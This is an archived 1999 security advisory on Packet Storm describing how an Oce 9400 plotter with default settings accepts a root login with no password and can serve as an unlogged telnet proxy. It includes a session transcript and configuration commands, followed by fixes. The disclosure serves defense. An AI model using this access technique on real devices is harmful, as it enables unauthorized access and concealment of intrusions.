what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

oce9400.txt

oce9400.txt
Posted Nov 24, 1999
Authored by Larry W. Cashdollar

The Oce 9400 plotter can be used as a telnet proxy in its default configuration.

tags | exploit
SHA-256 | 7dc17fea3ce18547115679dce3605f71296d6cdbc78e338c5547cbcc1a17902e
Download | Favorite | View

oce9400.txt

Change Mirror Download
 This appeared on bugtraq in August of 99 

 I am aware of the Intelligent Peripherals bulletin by CIAC.

        http://www.ciac.org/ciac/bulletins/j-019.shtml

        I have a few plotters / printers under my audit umbrella and
noticed something interesting on an Oce' 9400 plotter.  The printer has
the ability to be a telnet proxy.  Where as a user can hop via telnet to
other hosts.  If the printer is not setup properly the connections will
go unlogged.

bunyip% telnet JPP1
Trying 192.168.38.244...
Connected to JPP1.
Escape character is '^]'.

Network Printer Server Version 5.6.3 (192.168.38.244)

login: root
Password:[Just enter here]

Welcome root user


WARNING: current and stored values differ.
Use 'list diff' command to find the differences.
Current values will be lost if unit is reset.

192.168.38.244:root> telnet 192.168.38.110
trying 192.168.38.110 ...
Connected to 192.168.38.110
Escape character is '0x18'

Red Hat Linux release 5.9 (Starbuck)
Kernel 2.2.3-5 on an i586
login:

192.168.38.244:root> list sysinfo
             name:
          contact:
         location:
          version: 5.6.3
    serial number: 13029
         compiled: Mar 25 1998    loginfo: sys
          logport:
           syslog: 255.255.255.255
            email: NetPrint@<unconfigured>
       dns server: 192.168.38.110
           module: novell, appletalk, netbios
         checksum: 1E54


         All that is needed is a valid DNS server setup in the plotter
configuration.

192.168.38.244:root> set sysinfo dns 192.168.38.100

And anyone can use the plotter as an anonymous telnet proxy.

Fix:

Enable passwords for the accounts on the plotter:

syntax: set user add <NAME>
         set user del <NAME>
         set user passwd <NAME> [<PASSWORD>]
         set user type <NAME> root|guest
         set user from default|stored

Enable logging:

syntax: set logpath <LOGPATH> name <NEW_NAME>
         set logpath <LOGPATH> type [[-]job] [[-]user] [[-]pgcnt]
[[-]cksum]
                     [[-]printer] [[-]ioport]
         set logpath <LOGPATH> port <TCP-PORT>|email|syslog
         set logpath from default|stored

Larry W. Cashdollar
http://vapid.dhs.org 
lwc@vapid.dhs.org


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close